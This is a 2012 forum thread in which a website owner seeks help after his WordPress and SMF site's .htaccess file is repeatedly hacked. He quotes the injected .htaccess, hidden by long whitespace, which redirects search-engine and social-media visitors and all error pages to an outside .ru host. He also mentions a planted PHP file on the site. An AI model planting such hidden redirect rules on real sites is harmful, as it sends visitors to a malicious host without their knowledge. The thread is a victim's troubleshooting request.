htaccess nightmare

.Griff. · 25 Feb 2012 at 16:49

Someone or something keeps editing the htaccess files on my website and I'm struggling to resolve it.

My website consists of two parts. Wordpress for the homepage and SMF for the forum. Both Wordpress and SMF are the current versions and all plugins are up-to-date. I've created a backup of the entire site, downloaded it to my PC and scanned it with Webroot and Malwarebytes but they both fail to find anything.

I've just edited the htaccess file back and Sucuri SiteCheck reports everything is ok. However within an hour I can pretty much guarantee they've been edited again.

Can anyone advise me on what to try next?

.Griff. · 25 Feb 2012 at 16:56

I've already reset the ftp password (lower and upper case, mix of letters and numbers).

At present the htaccess file is -

Code:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

When it keeps getting edited it looks like this (Scroll right) -

Code:

																										<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://emisacbannortim.ru/upday/index.php [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://emisacbannortim.ru/upday/index.php [R=301,L]																														
																														</IfModule>																														
																																																												






# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress




















































																																																												
																														ErrorDocument 400 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 401 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 403 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 404 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 500 http://emisacbannortim.ru/upday/index.php

.Griff. · 25 Feb 2012 at 17:06

It's hosted with http://www.ezpzhosting.co.uk/ via my friends reseller account.

.Griff. · 25 Feb 2012 at 17:08

daz said:
This is almost always caused by your FTP credentials being hacked - I'd recommend changing your passwords and scanning any computers you use for FTP for malware.

I've changed the FTP password already Daz using the cpanel password generator (lower/upper case, letters and numbers) but htaccess had been edited again since.

Only two machines have ftp access and both have been scanned with Webroot and Malwarebytes but nothing found.

.Griff. · 25 Feb 2012 at 17:29

It's funny you mention that. The htaccess file was last modified at 15:18. Using cpanel I could see a Russian IP address access the site at the same time and access a weird looking PHP file.

My knowledge of PHP is next to nothing but the file name "871368108093.php" looked out of place compared to the rest in that folder.

I've looked at the file but I don't know if the contents are sinister or not.

.Griff. · 25 Feb 2012 at 17:40

It was located in public_html\forum\sources -

http://pastebin.com/Huqy1pLe

.Griff. · 25 Feb 2012 at 18:05

Thanks Locke. I've deleted it and asked my host to change the root password.

I ensured all packages were up to date yesterday but failed to spot that php file until this afternoon.

.Griff. · 25 Feb 2012 at 19:41

Thanks for taking the time to come up with the additional info Pho.